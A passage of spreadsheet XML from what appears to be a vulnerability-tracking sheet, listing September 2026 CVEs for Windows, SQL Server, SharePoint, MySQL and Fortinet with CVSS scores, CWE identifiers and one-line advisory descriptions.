        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69627</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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8" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Licensing Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69627</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69808</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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9" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69862</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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0" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70145</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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1" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70290</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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2" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32 Kernel Subsystem allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70290</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71341</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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3" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Partition Management Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71341</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73008</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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4" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t>Exposure of private personal information to an unauthorized actor in Windows Biometric Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73008</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77488</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K395" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in SQL Server allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77488</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77491</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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6" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78454</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83501</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K398" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83501</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83991</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K39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99" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Cloud Files Mini Filter Driver allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83991</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86673</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86673</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69402</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K401" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69402</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69417</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K402" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69417</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69690</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K403" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69690</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84385</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S404"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T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84385</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47680</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
